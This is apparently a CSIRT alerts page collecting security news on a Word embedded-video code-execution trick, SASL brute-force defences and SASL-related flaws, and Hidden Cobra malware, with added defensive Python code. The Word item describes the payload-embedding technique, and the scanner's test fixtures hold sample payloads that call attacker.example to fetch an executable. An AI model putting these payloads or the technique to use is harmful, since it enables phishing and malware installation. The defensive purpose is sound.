Alerts

Microsoft Word documents can potentially smuggle in malicious code using embedded web videos, it is claimed. Opening a booby-trapped file, and clicking on the vid, will trigger execution of the code.

In summary, miscreants can leverage this weakness to potentially trick marks into installing malware on their PCs. It’s useful for hackers preying on non-savvy phishing targets, and the like.

Seeing as there is no official patch for the alleged vulnerability, a workaround is to block files with embedded videos, or use other defenses to prevent dodgy documents from compromising systems and networks.

The alleged flaw was flagged up this week by infosec bods at Cymulate, who claimed a lack of safeguards in the way Redmond’s Office 2016 and earlier handle video material opens a door for remote code execution attacks.

“Attackers could use this for malicious purposes such as phishing, as the document will show the embedded online video with a link to YouTube, while disguising a hidden html/javascript code that will be running in the background and could potentially lead to further code execution scenarios,” Cymulate CTO Avihai Ben-Yossef claimed on Thursday.

“This attack is carried out by embedding a video inside a Word document, editing the XML file named document.xml, replacing the video link with a crafted payload created by the attacker which opens Internet Explorer Download Manager with the embedded code execution file.”

Delivery

So, it works like this: the attacker creates an otherwise normal Word file and, within the text, embeds an online video from YouTube or any other streaming site; the video itself doesn't matter here. From there, the attacker unpacks the resulting .docx file (which is simply a ZIP archive) and edits the word/document.xml file within.

That XML file, the researchers explained, is where the real danger lies. The embedded video is stored there as an embeddedHtml attribute holding the iframe markup for the player, and a miscreant can replace that markup with any HTML or JavaScript of their choosing.

The .docx is packed up with the twiddled XML, and sent to a victim, say, via email. When the file is opened in Word, and the mark is tricked into clicking on the video frame, the modified HTML is rendered, sans security warnings, and its code is executed. This could be used to fool people into installing fake Adobe Flash updates that contain spyware.

Microsoft has yet to comment on the claims, and has not had a chance to issue a patch or fix, we understand.

In the meantime, to mitigate against this, according to Cymulate, admins can block embedded video or block Word docs that contain an embeddedHtml attribute. Note that the attribute lives inside word/document.xml within the .docx ZIP container, so a mail or web filter has to unpack the archive to see it; a check on the file extension or magic bytes alone will not catch it. Also, don't open or trust Word documents from strangers, and don't run installers that pop up unexpectedly from Office files. ®
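A detection check for the mitigation above, as an added example (it is not Cymulate's, Microsoft's or The Register's code): it unzips a .docx, pulls every embeddedHtml attribute out of word/document.xml, and flags any payload that carries script or event handlers, or whose iframe points somewhere other than an allow-listed video host. The attribute name comes from the write-up; the wp15:webVideoPr element used to build the sample documents, the host allow-list and the constructed payloads are assumptions for illustration.

```python
"""Scan a .docx for embedded-video HTML and flag payloads that are not a plain
iframe to an allow-listed video host. Added example, not code from Cymulate,
Microsoft or The Register; it assumes the attribute is literally named
embeddedHtml inside word/document.xml, as the write-up describes."""
import html
import io
import re
import zipfile
from urllib.parse import urlparse

# Hosts a legitimate Word online-video embed normally points at (assumption:
# tune this to your own policy).
ALLOWED_VIDEO_HOSTS = {"www.youtube.com", "youtube.com", "www.youtube-nocookie.com"}

# The attribute value is entity-encoded XML, so quotes inside the HTML appear
# as &quot; and cannot terminate the match early.
_EMBEDDED_HTML_RE = re.compile(r'embeddedHtml\s*=\s*(["\'])(.*?)\1',
                               re.IGNORECASE | re.DOTALL)
_IFRAME_SRC_RE = re.compile(r'<iframe\b[^>]*?\bsrc\s*=\s*["\']([^"\']+)["\']',
                            re.IGNORECASE | re.DOTALL)
# Heuristic for active content: a script tag, a javascript: URL, or an
# on...= event-handler attribute.
_ACTIVE_CONTENT_RE = re.compile(r'<script\b|javascript:|\bon[a-z]+\s*=',
                                re.IGNORECASE)


def extract_embedded_html(docx_bytes: bytes) -> list[str]:
    """Decoded embeddedHtml payloads from word/document.xml (empty if none)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if "word/document.xml" not in zf.namelist():
            return []
        xml = zf.read("word/document.xml").decode("utf-8", errors="replace")
    return [html.unescape(m.group(2)) for m in _EMBEDDED_HTML_RE.finditer(xml)]


def classify_payload(payload: str) -> str:
    """'clean' for a bare iframe to an allowed host, otherwise the reason."""
    if _ACTIVE_CONTENT_RE.search(payload):
        return "active content (script or event handler) in embeddedHtml"
    m = _IFRAME_SRC_RE.search(payload)
    if not m:
        return "embeddedHtml without a recognisable video iframe"
    host = (urlparse(m.group(1)).hostname or "").lower()
    if host not in ALLOWED_VIDEO_HOSTS:
        return f"iframe points at non-allow-listed host {host!r}"
    return "clean"


def scan_docx(docx_bytes: bytes) -> list[str]:
    """Findings for one document; an empty list means nothing to block."""
    findings = [classify_payload(p) for p in extract_embedded_html(docx_bytes)]
    return [f for f in findings if f != "clean"]


# --- constructed test documents (minimal OOXML, not produced by Word) --------
# The element and namespace wrapping the attribute are an assumption; only the
# attribute name matters to the scanner.
_DOC_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
    ' xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"'
    ' xmlns:wp15="http://schemas.microsoft.com/office/word/2012/wordprocessingDrawing">'
    '<w:body><w:p><w:r><w:drawing><wp:inline><wp:docPr id="1" name="Video 1">'
    '<wp15:webVideoPr embeddedHtml="{embed}" h="315" w="560"/>'
    '</wp:docPr></wp:inline></w:drawing></w:r></w:p></w:body></w:document>'
)


def build_docx(embedded_html: str) -> bytes:
    """Zip up a one-paragraph document carrying the given video HTML."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        zf.writestr("word/document.xml",
                    _DOC_TEMPLATE.format(embed=html.escape(embedded_html, quote=True)))
    return buf.getvalue()


# Constructed payloads: what Word writes for a YouTube embed, a redirected
# iframe, and an embed with a script appended.
BENIGN_EMBED = ('<iframe width="560" height="315" '
                'src="https://www.youtube.com/embed/VIDEO_ID" frameborder="0" '
                'allowfullscreen></iframe>')
REDIRECT_EMBED = '<iframe src="https://attacker.example/update.html"></iframe>'
SCRIPT_EMBED = ('<iframe src="https://www.youtube.com/embed/VIDEO_ID"></iframe>'
                '<script>window.location="https://attacker.example/flash_update.exe"</script>')

if __name__ == "__main__":
    for label, embed in (("benign", BENIGN_EMBED), ("redirect", REDIRECT_EMBED),
                         ("script", SCRIPT_EMBED)):
        print(label, scan_docx(build_docx(embed)) or ["clean"])
```

The scanner deliberately keys on the attribute rather than on the outer element, because a filter that only recognises the exact markup Word emits is trivially bypassed by reordering or renaming the wrapper; blocking on any embeddedHtml attribute at all, as Cymulate suggests, is the stricter policy.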

Updated to add

Seems Microsoft won’t be addressing this because, as far as it is concerned, the software is working as expected. “The product is properly interpreting HTML as designed – working in the same manner as similar products,” said Jeff Jones, a senior director at Microsoft.

So, as we suggested, don’t open files or links from suspicious or unknown sources, and don’t click to allow stuff to install if anything weird pops up. Meanwhile, apply defense-in-depth mechanisms, and stop compromises from spreading from a single user to the whole network.


The information contained in this website is for general information purposes only. The information is gathered from The Register and, while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

Simple Authentication and Security Layer (SASL) is an authentication layer used in Internet protocols. SASL is not a protocol, but rather a framework that provides developers of applications and shared libraries with mechanisms for authentication, data integrity–checking, and encryption.

Within the framework and a few of its plugins, there are a couple of known vulnerabilities that we want to make you aware of. Although patches have been issued, not everyone has implemented them.

Why would I need to know about SASL?

Most server administrators will recognize the acronym from this type of error message or report:

“SASL LOGIN authentication failed: authentication failure”

Usually the message will contain more details about the failure, depending on the specific software and plugins that you are using. While receiving such a message in itself is not a reason for alarm, if you see it repeatedly and originating from the same IP address, then there is reason to investigate further. Possibly someone is trying to gain access to your server and planning to use it as a spam-box. They might be looking for a way to use your server and your resources to send out a spam campaign.

Countermeasures against brute force attacks

SASL attacks usually turn out to be brute force attacks, meaning an automated script or a bot is trying over and over to log into an existing email account on your server, trying many combinations of credentials to find a valid username and password pair. Thankfully, there are some countermeasures you can take against these attacks.

  • If you have the option to make your server listen on a different port, doing so might make you a less likely target for new attacks.
  • If the SASL message is from the same IP all the time, block that IP in your firewall.
  • If the attackers keep coming at you from different IPs, use a tool that watches the authentication log and automatically blocks any new assailant after a set number of failures (fail2ban is the common choice on Linux). One caveat to this solution: be vigilant about false positives so that you don’t shut out legitimate users, such as remote employees who mistype a new password; allow-list their address ranges.

If you are seeing some of these attacks, there is no reason to feel singled out. There are threat actors out there that constantly sweep the Internet for new servers listening on port 25.
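The detection logic behind the countermeasures above, run over sample log lines, as an added example (it is not fail2ban's or any product's code): it parses the Postfix "SASL ... authentication failed" warnings quoted earlier, counts failures per source address inside a sliding time window, skips an allow-list so remote employees are not locked out, and emits the firewall commands for the addresses that cross the threshold. The log lines are constructed, the 10.0.0.0/8 VPN range is an assumption, and the nftables set name sasl_block is assumed to exist with a drop rule attached to it.

```python
"""Spot SASL brute-force sources in a Postfix mail log and emit firewall
commands for them. Added example; not from Malwarebytes or any product. The
log lines are constructed and the nftables set name is an assumption."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Constructed sample in Postfix/syslog format. 203.0.113.5 hammers the server,
# 198.51.100.77 fails twice (a typo, not an attack) and 10.0.0.12 is a remote
# employee on the VPN range mistyping a new password six times.
SAMPLE_MAILLOG = """\
Nov  2 10:15:32 mail postfix/smtpd[4121]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Nov  2 10:15:33 mail postfix/smtpd[4121]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Nov  2 10:15:35 mail postfix/smtpd[4121]: warning: unknown[203.0.113.5]: SASL PLAIN authentication failed: authentication failure
Nov  2 10:16:01 mail postfix/qmgr[1402]: 3F1A2C0B1E: from=<bob@example.org>, size=4213, nrcpt=1 (queue active)
Nov  2 10:16:10 mail postfix/smtpd[4130]: warning: host77.example.net[198.51.100.77]: SASL LOGIN authentication failed: authentication failure
Nov  2 10:16:40 mail postfix/smtpd[4121]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Nov  2 10:17:02 mail postfix/smtpd[4121]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Nov  2 10:17:05 mail postfix/smtpd[4121]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Nov  2 10:18:00 mail postfix/smtpd[4130]: warning: host77.example.net[198.51.100.77]: SASL LOGIN authentication failed: authentication failure
Nov  2 10:20:00 mail postfix/smtpd[4140]: warning: vpn12.corp.example[10.0.0.12]: SASL LOGIN authentication failed: authentication failure
Nov  2 10:20:09 mail postfix/smtpd[4140]: warning: vpn12.corp.example[10.0.0.12]: SASL LOGIN authentication failed: authentication failure
Nov  2 10:20:18 mail postfix/smtpd[4140]: warning: vpn12.corp.example[10.0.0.12]: SASL LOGIN authentication failed: authentication failure
Nov  2 10:20:27 mail postfix/smtpd[4140]: warning: vpn12.corp.example[10.0.0.12]: SASL LOGIN authentication failed: authentication failure
Nov  2 10:20:36 mail postfix/smtpd[4140]: warning: vpn12.corp.example[10.0.0.12]: SASL LOGIN authentication failed: authentication failure
Nov  2 10:20:45 mail postfix/smtpd[4140]: warning: vpn12.corp.example[10.0.0.12]: SASL LOGIN authentication failed: authentication failure
"""

# Matches the Postfix smtpd warning for a failed SASL attempt (any mechanism).
_FAIL_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ postfix/smtpd\[\d+\]: "
    r"warning: (?P<host>\S+)\[(?P<ip>[0-9a-fA-F.:]+)\]: SASL (?P<mech>\S+) authentication failed"
)

# Assumption: the corporate VPN range whose users must never be auto-blocked.
DEFAULT_ALLOWLIST = ("10.0.0.0/8",)


def parse_failures(log_text: str):
    """Yield (timestamp, ip, mechanism) for every SASL failure line, in log order."""
    for line in log_text.splitlines():
        m = _FAIL_RE.match(line)
        if m:
            # syslog stamps carry no year; deltas within one log are still correct
            yield datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["ip"], m["mech"]


def find_brute_forcers(log_text: str, threshold: int = 5, window_seconds: int = 600,
                       allowlist=DEFAULT_ALLOWLIST) -> dict:
    """Return {ip: total failures} for every address that produced at least
    `threshold` failures within any `window_seconds` span, excluding the allow-list."""
    allow_nets = [ip_network(n) for n in allowlist]
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)      # ip -> timestamps inside the current window
    totals = defaultdict(int)
    flagged = set()
    for ts, ip, _mech in parse_failures(log_text):
        if any(ip_address(ip) in net for net in allow_nets):
            continue
        totals[ip] += 1
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:    # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            flagged.add(ip)
    return {ip: totals[ip] for ip in flagged}


def nft_block_commands(ips, set_name: str = "inet filter sasl_block") -> list:
    """One nft command per address; assumes the named set exists and a rule
    drops traffic from its members."""
    return [f"nft add element {set_name} {{ {ip} }}" for ip in sorted(ips)]


if __name__ == "__main__":
    offenders = find_brute_forcers(SAMPLE_MAILLOG)
    for ip, count in offenders.items():
        print(f"{ip}: {count} failures")
    print("\n".join(nft_block_commands(offenders)))
```

Run on the sample, only 203.0.113.5 is reported (six failures in under two minutes); 198.51.100.77 stays under the threshold and 10.0.0.12 is skipped by the allow-list even though it also failed six times, which is exactly the false-positive case the caveat above warns about. Lower the threshold or shorten the window to taste, but do it with the allow-list in place.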

SASL framework

SASL is a framework for application protocols, such as SMTP or IMAP, that adds authentication support: it lets the server verify who the client is before deciding whether that user may use the server in the way they request. It also offers a framework for data integrity checking and encryption of the rest of the session (the negotiated "security layer" that gives SASL its name).

For a better understanding of how the framework actually works and where the vulnerabilities throw a wrench in the process, we want to give you some background about the flow of information between server and clients.

Client and server applications make calls to their local copies of the SASL library, libsasl, through the SASL API. libsasl then communicates with the SASL mechanisms (PLAIN, LOGIN, CRAM-MD5, SCRAM and so on, each implemented as a plugin) through the SASL service provider interface (SPI).

The following diagram shows steps in the SASL life cycle. The client actions are shown on the left and the server actions on the right. The arrows in the middle show interactions between the client and server over an external connection.
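The client and server sides of that life cycle, written out for the PLAIN mechanism as carried by SMTP AUTH, as an added example (this is not libsasl's or any mail server's code): the client packs the authorization id, authentication id and password into one base64 blob, the server unpacks it, refuses the mechanism when the connection is not protected by TLS, and answers with the SMTP reply the client would see. The account store, its salt and the exact reply texts are constructed for illustration.

```python
"""Both sides of a SASL PLAIN exchange as carried by SMTP AUTH (RFC 4616 /
RFC 4954). Added example; it is not libsasl or any server's code, and the
credential store, salt and reply texts are constructed for illustration."""
import base64
import hashlib
import hmac

_SALT = b"constructed-salt"   # real deployments use a random per-user salt


def _derive(password: str) -> bytes:
    """Password hash as the server stores it (PBKDF2-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), _SALT, 50_000)


# Constructed account database: authentication id -> password hash.
USERS = {"alice@example.org": _derive("correct horse battery")}


def client_auth_plain(authcid: str, password: str, authzid: str = "") -> str:
    """Client side: encode authzid NUL authcid NUL passwd as one base64 blob."""
    for field in (authzid, authcid, password):
        if "\0" in field:
            raise ValueError("NUL is not permitted inside PLAIN fields")
    message = f"{authzid}\0{authcid}\0{password}".encode("utf-8")
    return base64.b64encode(message).decode("ascii")


def parse_auth_plain(blob: str):
    """Server side: return (authzid, authcid, password) or None if malformed."""
    try:
        raw = base64.b64decode(blob, validate=True)
        parts = raw.split(b"\0")
        if len(parts) != 3:          # exactly two NUL separators, no more, no fewer
            return None
        return tuple(p.decode("utf-8") for p in parts)
    except ValueError:               # bad base64 (binascii.Error) or bad UTF-8
        return None


def server_authenticate(blob: str, tls_active: bool) -> str:
    """Server side: run the mechanism and return the SMTP reply line."""
    if not tls_active:
        # PLAIN ships the password in the clear; only offer it under TLS.
        return "538 5.7.11 Encryption required for requested authentication mechanism"
    creds = parse_auth_plain(blob)
    if creds is None:
        return "501 5.5.2 Malformed AUTH PLAIN response"
    authzid, authcid, password = creds
    if authzid and authzid != authcid:
        return "535 5.7.8 Error: authentication failed: proxy authorisation not permitted"
    # Always derive, so unknown and known users cost the same (no timing oracle),
    # and compare in constant time.
    candidate = _derive(password)
    stored = USERS.get(authcid)
    if stored is None or not hmac.compare_digest(candidate, stored):
        return "535 5.7.8 Error: authentication failed"
    return "235 2.7.0 Authentication successful"


def smtp_exchange(authcid: str, password: str, tls_active: bool = True) -> list:
    """The wire transcript of one AUTH PLAIN attempt, client line then server line."""
    blob = client_auth_plain(authcid, password)
    return [f"C: AUTH PLAIN {blob}", f"S: {server_authenticate(blob, tls_active)}"]


if __name__ == "__main__":
    for args in (("alice@example.org", "correct horse battery"),
                 ("alice@example.org", "wrong password"),
                 ("alice@example.org", "correct horse battery", False)):
        print("\n".join(smtp_exchange(*args)), "\n")
```

The "authentication failed" reply is what ends up in the mail log as the "SASL LOGIN authentication failed" line discussed earlier (LOGIN is a non-standard cousin of PLAIN that sends the two fields in separate base64 prompts). Two points worth keeping from the server side: the mechanism is refused outright when TLS is not active, and a missing account costs the same as a wrong password, so an attacker cannot enumerate valid usernames from response timing.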

Memcached vulnerability

Memcached is a software package that implements a high-performance caching server for storing chunks of data obtained from database and API calls in RAM. This helps speed up dynamic web applications, making it well suited for large websites and big-data projects.

In 2016, security researchers from Cisco’s Talos found three remote code execution vulnerabilities in memcached (CVE-2016-8704, CVE-2016-8705 and CVE-2016-8706). All of these memory-corruption flaws affected memcached’s binary protocol for storing and retrieving data, and the last of them was in the Simple Authentication and Security Layer (SASL) authentication handling. They were fixed in memcached 1.4.33 later that year, but patch adoption has been poor.

Dovecot server vulnerabilities

A Denial of Service vulnerability was found in the SASL authentication component of the Dovecot server. An unauthenticated remote attacker can crash the auth process by supplying a crafted username during SASL authentication, because of an input-validation error that is reachable only when the auth-policy component has been activated. The vulnerable versions were 2.2.25 through 2.2.26.1, and unfortunately some of these are still in active use.

Another flaw was found in Dovecot 2.0 up to 2.2.33 and 2.3.0. An abort of SASL authentication results in a memory leak in the Dovecot auth client used by login processes. The leak has an impact on high-performance configurations where the same login processes are reused and can cause the process to crash due to memory exhaustion.

More recent vulnerabilities

A more recent vulnerability was found in Apache Qpid Broker-J, the Java broker. The C++ Qpid broker and its clients use the Cyrus SASL library, a full-featured authentication framework which offers many configuration options; Broker-J instead authenticates incoming AMQP connections through special entities called “Authentication Providers.” Each Authentication Provider can support several SASL mechanisms, which are offered to the connecting clients as part of the SASL negotiation process.

The vulnerability that was discovered is a Denial of Service vulnerability, and it was found in Apache Qpid Broker-J 7.0.0 in the functionality for authentication of connections for AMQP protocols 0-8, 0-9, 0-9-1 and 0-10 when either the PLAIN or the XOAUTH2 SASL mechanism is used. The vulnerability allows an unauthenticated attacker to crash the Broker instance.


The information above is gathered from Malwarebytes.

Hidden Cobra malware infects Android devices with RAT, turns Windows machines into proxies

The Department of Homeland Security (DHS) and FBI on Tuesday jointly released two new reports analyzing trojan malware attributed to Hidden Cobra, aka Lazarus Group — a threat actor widely believed to be sponsored by the North Korean government.

The two malware packages, referred to as HARDRAIN and BADCALL, can install a remote access tool (RAT) payload on Android devices, and force infected Windows systems to act as a proxy server, disguising their command-and-control communications to appear as if they are encrypted TLS/SSL (HTTPS) sessions.

According to the DHS and FBI, HARDRAIN is composed of three malicious executable files. The first two are 32-bit Windows dynamic link library (DLL) executables, which configure the Windows Firewall to allow incoming connections so that the machines can function as proxies. Illicit communications are masked as HTTPS sessions by leveraging public certificates sourced from legitimate Internet services; in reality, the traffic is encrypted using an unidentified algorithm rather than TLS.

Accompanying these two DLL files is an Android Executable and Linkable Format (ELF) file that connects to hard-coded Internet Protocol (IP) addresses and acts as a RAT program.

BADCALL is also composed of three separate files — and as with HARDRAIN, the first two are Windows executables designed to disable the firewall (by modifying a registry key) and transform infected systems into proxy servers. They, too, disguise malicious C2 communications as encrypted HTTPS traffic, but in actuality they encrypt their activity using a rudimentary cipher (XOR/ADD and SUB/XOR, respectively).

The third file, meanwhile, is an Android Package Kit (APK) that, according to the BADCALL report, acts as a RAT program “capable of recording phone calls, taking screenshots using the device’s embedded camera, reading data from the contact manager, and downloading and uploading data from the compromised Android device.” It can also execute commands and scan for open Wi-Fi channels.


The information above is provided by SC Magazine.